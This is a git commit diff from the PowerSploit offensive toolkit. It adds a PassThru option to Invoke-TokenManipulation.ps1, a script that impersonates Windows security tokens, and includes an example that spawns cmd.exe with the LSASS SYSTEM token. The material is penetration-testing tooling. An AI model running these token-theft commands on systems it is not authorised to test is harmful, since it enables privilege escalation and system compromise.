diff options
| author | Matt Graeber <mattgraeber@gmail.com> | 2014-10-01 20:49:35 -0400 |
|---|---|---|
| committer | Matt Graeber <mattgraeber@gmail.com> | 2014-10-01 20:49:35 -0400 |
| commit | 4daac216c881d6e6750a2b3daadf77266ab1eb83 (patch) | |
| tree | 21924fec1249fed68210e1233dc9cb1b58455a70 /Exfiltration | |
| parent | 0ca33b03479f16b572c8991285ca36b4574a1822 (diff) | |
| parent | ba02a116872c52103e02e8da0c037911cb1a2309 (diff) | |
| download | PowerSploit-4daac216c881d6e6750a2b3daadf77266ab1eb83.tar.gz PowerSploit-4daac216c881d6e6750a2b3daadf77266ab1eb83.zip | |
Merge pull request #56 from clymb3r/master
Added -PassThru to Invoke-TokenManipulation
Diffstat (limited to 'Exfiltration')
| -rw-r--r-- | Exfiltration/Invoke-TokenManipulation.ps1 | 40 |
1 files changed, 35 insertions, 5 deletions
diff --git a/Exfiltration/Invoke-TokenManipulation.ps1 b/Exfiltration/Invoke-TokenManipulation.ps1 index 8c8b7b4..7bfce3b 100644 --- a/Exfiltration/Invoke-TokenManipulation.ps1 +++ b/Exfiltration/Invoke-TokenManipulation.ps1 @@ -49,7 +49,8 @@ Author: Joe Bialek, Twitter: @JosephBialek License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None -Version: 1.1 +Version: 1.11 +(1.1 -> 1.11: PassThru of System.Diagnostics.Process object added by Rune Mariboe, https://www.linkedin.com/in/runemariboe) .DESCRIPTION @@ -106,6 +107,10 @@ If you are creating a process which doesn't need a UI to be rendered, use this f current user. If this flag isn't set and -CreateProcess is used, this script will modify the ACL's of the current users desktop to allow full control to "Everyone". +.PARAMETER PassThru + +If you are creating a process, this will pass the System.Diagnostics.Process object to the pipeline. + .EXAMPLE @@ -151,6 +156,12 @@ Spawns cmd.exe using the primary token of LSASS.exe. This pipes the output of Ge .EXAMPLE +(Get-Process wininit | Invoke-TokenManipulation -CreateProcess "cmd.exe" -PassThru).WaitForExit() + +Spawns cmd.exe using the primary token of LSASS.exe. Then holds the spawning PowerShell session until that process has exited. + +.EXAMPLE + Get-Process wininit | Invoke-TokenManipulation -ImpersonateUser Makes the current thread impersonate the lsass security token. @@ -220,7 +231,11 @@ Blog on this script: http://clymb3r.wordpress.com/2013/11/03/powershell-and-toke [Parameter(ParameterSetName = "CreateProcess")] [Switch] - $NoUI + $NoUI, + + [Parameter(ParameterSetName = "CreateProcess")] + [Switch] + $PassThru ) Set-StrictMode -Version 2 @@ -1549,7 +1564,11 @@ Blog on this script: http://clymb3r.wordpress.com/2013/11/03/powershell-and-toke [Parameter(Position=2)] [String] - $ProcessArgs + $ProcessArgs, + + [Parameter(Position=3)] + [Switch] + $PassThru ) Write-Verbose "Entering Create-ProcessWithToken" #Duplicate the token so it can be used to create a new process @@ -1600,6 +1619,18 @@ Blog on this script: http://clymb3r.wordpress.com/2013/11/03/powershell-and-toke $ProcessInfo = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ProcessInfoPtr, [Type]$PROCESS_INFORMATION) $CloseHandle.Invoke($ProcessInfo.hProcess) | Out-Null $CloseHandle.Invoke($ProcessInfo.hThread) | Out-Null + + #Pass created System.Diagnostics.Process object to pipeline + if ($PassThru) { + #Retrieving created System.Diagnostics.Process object + $returnProcess = Get-Process -Id $ProcessInfo.dwProcessId + + #Caching process handle so we don't lose it when the process exits + $null = $returnProcess.Handle + + #Passing System.Diagnostics.Process object to pipeline + $returnProcess + } } else { @@ -1841,7 +1872,7 @@ Blog on this script: http://clymb3r.wordpress.com/2013/11/03/powershell-and-toke Set-DesktopACLs } - Create-ProcessWithToken -hToken $hToken -ProcessName $CreateProcess -ProcessArgs $ProcessArgs + Create-ProcessWithToken -hToken $hToken -ProcessName $CreateProcess -ProcessArgs $ProcessArgs -PassThru:$PassThru Invoke-RevertToSelf } @@ -1880,4 +1911,3 @@ Blog on this script: http://clymb3r.wordpress.com/2013/11/03/powershell-and-toke #Start the main function Main } - |